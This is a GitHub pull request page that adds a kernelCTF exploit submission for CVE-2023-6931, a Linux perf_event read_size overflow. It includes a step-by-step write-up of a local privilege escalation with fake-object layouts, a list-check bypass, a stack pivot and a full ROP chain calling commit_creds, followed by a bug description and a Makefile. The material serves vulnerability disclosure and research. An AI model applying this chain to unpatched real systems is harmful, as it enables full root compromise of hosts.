Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add kernelCTF CVE-2023-6931_mitigation #141

Open
wants to merge 5 commits into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
188 changes: 188 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-6931_mitigation/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,188 @@
# CVE-2023-6931

## Exploit Details

Exploit demo for CVE-2023-6931. Flag: `kernelCTF{v1:mitigation-v3b-6.1.55:1730717209:a3542a691dd87b35d0914ae264575ea3d6e888aa}`

## Overview

The vulnerability allows for multiple out-of-bounds increments at controlled offsets from the end of an array. The exploit in the LTS/COS leverages a fixed-size object called `netlink_sock` to use the SLUB allocator. However, protection techniques like `CONFIG_KMALLOC_SPLIT_VARSIZE` make exploiting this more difficult on mitigated instances. To bypass these protections, we carried out the exploit entirely within the Buddy allocator, without relying on the SLUB allocator. Using only the Buddy allocator, however, makes many useful objects unavailable and increases the complexity of the exploit. Additionally, although the vulnerability is a heap OOB, it effectively turns into a use-after-free (UAF) since the heap OOB is used to create the UAF, making it essentially the same as exploiting a UAF.

## KASLR & Heap & VMEMMAP Leak

```c
for_each_sibling_event(sub, leader) {
values[n++] += perf_event_count(sub);
if (read_format & PERF_FORMAT_ID)
values[n++] = primary_event_id(sub);
if (read_format & PERF_FORMAT_LOST)
values[n++] = atomic64_read(&sub->lost_samples);
}
```
OOB happens like above. So we can use event count, event id, lost samples to tamper with adjacent objects.

By repeatedly opening and closing the event, we can make the event ID bigger, then cover the size of the simple_xattr object with the event ID and read the members of the adjacent objects (`pipe_buffer`, `simple_xattr`) to get the KASLR, heap address and VMEMMAP.

## Make UAF

In kernels lower than linux-v6.2, xattr is managed using struct list_head. Therefore, if you corrupt the linked list structure of the `simple_xattr` object with oob and make it point to a fake object, you can trigger a uaf.

```
Note

In kernels above linux-v6.2, xattr is managed using struct rb_node, and in this case the tree is sorted by name value, so it is possible to create uaf by correcting the order of name value and corrupting rb_left or rb_right to point to fake object. So the way to trigger uaf using `simple_xattr` object is still valid even in high kernel version.
```

Setting the event config to `PERF_COUNT_SW_PAGE_FAULTS` will measure page faults, so the event count can be controlled to a desired value by intentionally causing page faults.

So I used the event count to increase the next field of `simple_xattr` by 0x30. This makes the next pointer point to the value field of `simple_xattr`, which allows me to create fake objects as I want.

```c
int setxattr_copy(const char __user *name, struct xattr_ctx *ctx)
{
int error;

if (ctx->flags & ~(XATTR_CREATE|XATTR_REPLACE))
return -EINVAL;

error = strncpy_from_user(ctx->kname->name, name,
sizeof(ctx->kname->name));
if (error == 0 || error == sizeof(ctx->kname->name))
return -ERANGE;
if (error < 0)
return error;

error = 0;
if (ctx->size) {
if (ctx->size > XATTR_SIZE_MAX)
return -E2BIG;

ctx->kvalue = vmemdup_user(ctx->cvalue, ctx->size);
if (IS_ERR(ctx->kvalue)) {
error = PTR_ERR(ctx->kvalue);
ctx->kvalue = NULL;
}
}

return error;
}
```

```c
void *vmemdup_user(const void __user *src, size_t len)
{
void *p;

p = kvmalloc(len, GFP_USER);
if (!p)
return ERR_PTR(-ENOMEM);

if (copy_from_user(p, src, len)) {
kvfree(p);
return ERR_PTR(-EFAULT);
}

return p;
}
```
And the `simple_xattr` object allocates a temporary buffer to copy the value before object allocation as above, and kvfrees it after copying the value. If you kvfree an object with the size of buddy system order 2, the data of the page will remain as it is, so if you use the above logic well, you can freely control all data including the header data of the reallocated object such as the uaf object. I actively utilized this temporary buffer in my exploit.
```c
((uint64_t *)value)[2] = xattr + 0x20000 + 0x40 - 0x30;
((uint64_t *)value)[3] = 0;
((uint64_t *)value)[4] = xattr + 0x20000 + 0x38 - 0x30;
((uint64_t *)value)[5] = 0x10;
```
The above code is the fake object. When the next field is incremented by 0x30, it points to the fake object, and the next field of the fake object is set to xattr + 0x20000 + 0x40, which is the value field of the target object to be uafed. xattr is the address of a random `simple_xattr` object that was leaked before.
```c
((uint64_t *)value)[0] = xattr + 0x18000;
((uint64_t *)value)[1] = xattr + 0x18000;
((uint64_t *)value)[2] = leakname;
((uint64_t *)value)[3] = 0x3000;
((uint64_t *)value)[4] = xattr + 0x20000 + 0x80;
((uint64_t *)value)[5] = xattr + 0x20000 + 0x60;
((uint64_t *)value)[6] = leakname;
((uint64_t *)value)[7] = 0x3000;
((uint64_t *)value)[8] = xattr + 0x20000 + 0x40;
((uint64_t *)value)[12] = xattr + 0x18000;
((uint64_t *)value)[13] = xattr + 0x20000 + 0x40;
((uint64_t *)value)[14] = leakname;
((uint64_t *)value)[15] = 0x3000;
```
This is the target object to create the uaf. Since buddy is a Last-In-First-Out structure, if the target object is freed and reallocated, the freed target object will be recycled as a temporary buffer. Therefore, after writing the value as above, kvfree is performed immediately, but the target object is still linked to the linked list of `simple_xattr` due to the fake object, so use after free can be triggered.

```c
bool __list_del_entry_valid(struct list_head *entry)
{
struct list_head *prev, *next;

prev = entry->prev;
next = entry->next;

if (CHECK_DATA_CORRUPTION(next == NULL,
"list_del corruption, %px->next is NULL\n", entry) ||
CHECK_DATA_CORRUPTION(prev == NULL,
"list_del corruption, %px->prev is NULL\n", entry) ||
CHECK_DATA_CORRUPTION(next == LIST_POISON1,
"list_del corruption, %px->next is LIST_POISON1 (%px)\n",
entry, LIST_POISON1) ||
CHECK_DATA_CORRUPTION(prev == LIST_POISON2,
"list_del corruption, %px->prev is LIST_POISON2 (%px)\n",
entry, LIST_POISON2) ||
CHECK_DATA_CORRUPTION(prev->next != entry,
"list_del corruption. prev->next should be %px, but was %px. (prev=%px)\n",
entry, prev->next, prev) ||
CHECK_DATA_CORRUPTION(next->prev != entry,
"list_del corruption. next->prev should be %px, but was %px. (next=%px)\n",
entry, next->prev, next))
return false;

return true;

}
```
And the reason why the value of the target object is set relatively complexly is to bypass the above verification. The object can be freed normally only when `entry == prev->next && entry == next->prev` is satisfied.

## UAF to RIP Control

I've created UAF, but it's not perfect yet. After assigning the target object address in the free list to the object you want to overwrite, you need to free the target object linked to the linked list to overwrite the object you want. However, the moment you reallocate the target object address, the data of the target object changes to match the allocated object, so the data that satisfies the conditions `entry == prev->next && entry == next->prev` is tampered with. Therefore, you cannot free the target object linked to the `simple_xattr` linked list.

To solve this problem, you need an object that can accept user input, such as `msg_msg`, and that can allocate over 0x2000. If you use an object that can accept user input, you can avoid destroying the target object's data by redefining the target object's data at the same time as allocating an object from the free list.

The `user_key_payload` object satisfies the condition perfectly. Therefore, the target object address is reallocated to `user_key_payload` and the target object in the `simple_xattr` linked list is freed again. The freed target object address is reallocated to a `pipe_buffer` structure and the previously allocated `user_key_payload` object is freed. If you try to allocate the `simple_xattr` object again, the address of the freed `user_key_payload` object is assigned to a temporary buffer, allowing you to freely manipulate the fields of the previously allocated `pipe_buffer`. Now that we can overwrite `pipe_buffer->ops`, we can do rip control. I overrode `pipe_buffer->ops->release()` to make the rip controlled when freeing the `pipe_buffer`.

## RIP Control to ROP

Now we need to perform a stack pivot to the heap address to enable ROP.
```c
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
```
When `pipe_buffer->ops->release()` is called, the arguments are passed as above. Therefore, the address of the `pipe_buffer` object to be released is entered into rsi. Since rsi has the address of `pipe_buffer`, we can do rop if we do `mov rsp, rsi ; ret`. However, I couldn't find such a neat gadget, so I combined `push rsi ; jmp qword ptr [rsi + 0x66]` and `pop rsp ; ret` to achieve the same effect.

Now rsp points to the `pipe_buffer` structure. However, since there is an `pipe_buffer->ops` field to be overwritten in the header, we need to move rsp further back in order to write a clean rop chain. We moved rsp to the back by executing `pop rsp ; ret` once more.

## ROP Chain

```c
rop[ridx++] = pop_rdi;
rop[ridx++] = 1;
rop[ridx++] = find_task_by_vpid;
rop[ridx++] = mov_rdi_rax_pop_rbx;
rop[ridx++] = 0;
rop[ridx++] = pop_rsi;
rop[ridx++] = init_nsproxy;
rop[ridx++] = switch_task_namespaces;
rop[ridx++] = pop_rdi;
rop[ridx++] = init_cred;
rop[ridx++] = commit_creds;
rop[ridx++] = kpti_trampoline;
rop[ridx++] = 0;
rop[ridx++] = 0;
rop[ridx++] = (uint64_t)shell;
rop[ridx++] = rv.user_cs;
rop[ridx++] = rv.user_rflags;
rop[ridx++] = rv.user_rsp;
rop[ridx++] = rv.user_ss;
```
The ROP Chain was written as above. I changed the namespace by executing `switch_task_namespace(find_task_by_vpid(1), &init_nsproxy)` and then elevated privileges to root by executing `commit_creds(&init_cred)`.

Returning to user mode is done by calling the `swapgs_restore_regs_and_return_to_usermode` function. Since there are a lot of pops at the beginning of the function, you can skip that part and just call it.
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
When a `perf_event` has the `PERF_FORMAT_GROUP` flag set in its `read_format`, each event added to its group increases its `read_size`. Since `read_size` is a `u16`, adding a few thousand events can cause an integer overflow. There is a check in `perf_validate_size()` to prevent an event from being added to a group if its `read_size` would be too large, but the `read_size` of the events already in the group can also increase and is not checked. An integer overflow can be caused by creating an event with `PERF_FORMAT_GROUP` and then adding events without `PERF_FORMAT_GROUP` to its group until the first event's `read_size` overflows.

`perf_read_group()` allocates a buffer using an event's `read_size`, then iterates through the `sibling_list`, incrementing and possibly writing to successive `u64` entries in the buffer. Overflowing `read_size` causes `perf_read_group()` to increment/write memory outside of the heap allocation.

The bug was introduced in `fa8c269353d5 ("perf/core: Invert perf_read_group() loops")` in 3.16 and partially fixed shortly after in `a723968c0ed3 ("perf: Fix u16 overflows")`. It was fixed in `382c27f4ed28 (perf: Fix perf_event_validate_size())` in 6.7.
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
exploit:
gcc -masm=intel -static -o exploit exploit.c -lkeyutils

prerequisites:
sudo apt-get install libkeyutils-dev

run:
./exploit

clean:
rm exploit
Binary file not shown.
Loading